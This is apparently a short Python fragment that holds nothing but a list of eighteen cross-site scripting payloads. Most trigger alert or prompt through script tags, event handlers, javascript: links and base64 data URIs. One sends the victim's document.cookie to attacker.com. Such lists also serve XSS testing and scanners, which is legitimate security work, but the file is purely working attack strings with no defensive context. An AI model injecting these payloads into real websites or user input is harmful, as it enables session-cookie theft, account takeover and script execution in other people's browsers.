payloads = ["""<script>alert(1)</script>""",
            """ <img src=x onerror=alert(1)>""",
            """ <svg/onload=alert(1)>""",
            """<body onload=alert(1)>""",
            """ <input type="text" value="XSS" onfocus=alert(1) autofocus>""",
            """<marquee onstart=alert(1)>XSS</marquee>""",
            """<a href="javascript:alert(1)">Click me</a>""",
            """ <a href="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==">Click me</a>""",
            """ <object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></object>""",
            """ <script>document.location="https://attacker.com/?cookie="+document.cookie</script>""",
            """<script>alert('XSS')</script>""",
            """<img src=x onerror=prompt(1)>""",
            """<svg/onload=prompt(1)>""",
            """<iframe srcdoc="<svg/onload=prompt(1)>"></iframe>""",
            """<body onload=prompt(1)>""",
            """ <link rel="stylesheet" href="javascript:prompt(1)">""",
            """<a href="javascript:prompt(1)">click me</a>""",
            """<script src="data:text/javascript,prompt(1)"></script>"""]
